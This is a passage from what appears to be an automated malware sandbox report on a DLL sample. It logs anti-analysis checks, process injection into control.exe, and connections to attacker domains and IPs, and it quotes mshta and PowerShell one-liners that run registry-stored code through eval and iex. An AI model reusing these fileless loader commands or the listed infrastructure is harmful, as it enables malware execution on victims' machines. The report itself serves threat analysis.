          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2320 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048 | Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3120 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 604 | Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 | Thread sleep count: 7538 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 | Thread sleep count: 1838 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320 | Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\System32\control.exe TID: 668 | Thread sleep time: -1773297476s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1599
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1057
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 2880
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1015
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 544
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 733
          Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1856
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 2687
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 1542
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 1728
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 588
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 1716
          Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 1395
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 559
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 513
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 533
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 376
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 586
          Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 438
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5010
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 861
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5211
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 585
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7563
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1830
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1838
          Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0102D1A3
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_010259E6
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0103F63F
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053DF63F
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053CD1A3
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053C59E6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_04ABF63F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_04AAD1A3
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_04AA59E6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_04C3F63F
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_04C259E6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_04C2D1A3
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0103E230
          Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655416579.00000000032F3000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471374260.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.515952009.00000000032E9000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.519374746.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.673893469.0000000003320000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_010449B3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0C57 mov eax, dword ptr fs:[00000030h] 0_2_013A0C57
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0CA5 mov eax, dword ptr fs:[00000030h] 0_2_013A0CA5
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0CE8 mov eax, dword ptr fs:[00000030h] 0_2_013A0CE8
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0B14 mov eax, dword ptr fs:[00000030h] 0_2_013A0B14
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0BFC mov eax, dword ptr fs:[00000030h] 0_2_013A0BFC
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0B14 mov eax, dword ptr fs:[00000030h] 3_2_030E0B14
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0BFC mov eax, dword ptr fs:[00000030h] 3_2_030E0BFC
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0C57 mov eax, dword ptr fs:[00000030h] 3_2_030E0C57
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0CA5 mov eax, dword ptr fs:[00000030h] 3_2_030E0CA5
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0CE8 mov eax, dword ptr fs:[00000030h] 3_2_030E0CE8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0CE8 mov eax, dword ptr fs:[00000030h] 4_2_006D0CE8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0BFC mov eax, dword ptr fs:[00000030h] 4_2_006D0BFC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0C57 mov eax, dword ptr fs:[00000030h] 4_2_006D0C57
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0CA5 mov eax, dword ptr fs:[00000030h] 4_2_006D0CA5
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_006D0B14 mov eax, dword ptr fs:[00000030h] 4_2_006D0B14
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0CA5 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CA5
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0CE8 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CE8
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0C57 mov eax, dword ptr fs:[00000030h] 5_2_02BF0C57
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0BFC mov eax, dword ptr fs:[00000030h] 5_2_02BF0BFC
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0B14 mov eax, dword ptr fs:[00000030h] 5_2_02BF0B14
          Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_010392F6
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_053D92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_053D92F6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_04AB92F6
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 5_2_04C392F6

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: berukoneru.website
          Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 3.20.161.64 187
          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 79.110.52.144 187
          Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: windows.update3.com
          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 18.219.227.107 187
          Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 3.12.124.139 187
          Maps a DLL or memory area into another process
          Source: C:\Windows\System32\loaddll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write
          Source: C:\Windows\System32\control.exe | Section loaded: unknown target: unknown protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
          Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\control.exe base: 8E0000
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: EC0000
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: ED0000
          Allocates memory in foreign processes
          Source: C:\Windows\System32\loaddll32.exe | Memory allocated: C:\Windows\System32\control.exe base: 8E0000 protect: page execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: EC0000 protect: page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\control.exe base: ED0000 protect: page execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\System32\loaddll32.exe | Thread register set: target process: 5116
          Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 5952
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 5832
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3440
          Source: C:\Windows\System32\control.exe | Thread register set: target process: 6676
          Source: C:\Windows\System32\control.exe | Thread register set: target process: 4856
          Source: C:\Windows\System32\control.exe | Thread register set: target process: 4964
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 88E31580
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
          Source: C:\Windows\System32\control.exe | Process created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp | Binary or memory string: &Program Manager
          Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
